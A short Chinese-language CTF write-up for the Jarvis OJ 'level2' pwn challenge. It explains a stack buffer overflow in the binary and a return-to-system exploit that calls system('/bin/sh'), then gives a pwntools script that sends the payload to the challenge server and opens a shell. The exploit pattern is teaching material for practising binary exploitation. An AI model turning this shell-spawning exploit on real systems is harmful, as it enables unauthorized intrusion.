(Jarvis Oj)(Pwn) level2

(Jarvis Oj)(Pwn) level2

首先用checksec查一下保护。这次NX开启了。

用ida反汇编，找到溢出点。

这次system函数又出现了。于是想着是否可以通过控制调用system(“/bin/sh”)得到shell，将返回地址用system的地址覆盖，将传入参数设置成”/bin/sh”，用ida查找了一下字符串，刚好发现了”/bin/sh”，于是记录下地址（或者使用pwntools的elf工具）。

整个逻辑的示意图如下:

注意不能在vulnerable函数的返回地址后面直接跟参数，我们需要模拟call system函数的过程，在这个过程中call有一步是将下一条指令的地址压栈，所以我们需要构造一个假的返回地址，当然这个内容随意。写得脚本如下。

  1 from pwn import *
  2 conn=remote("pwn2.jarvisoj.com","9878")
  3 e=ELF("./level2")
  4 sys_addr=e.symbols['system']
  5 pad=0x88
  6 sh_addr=e.search("/bin/sh").next()
  7 payload="A"*pad+"BBBB"+p32(sys_addr)+"dead"+p32(sh_addr    )
  8 conn.sendline(payload)
  9 conn.interactive();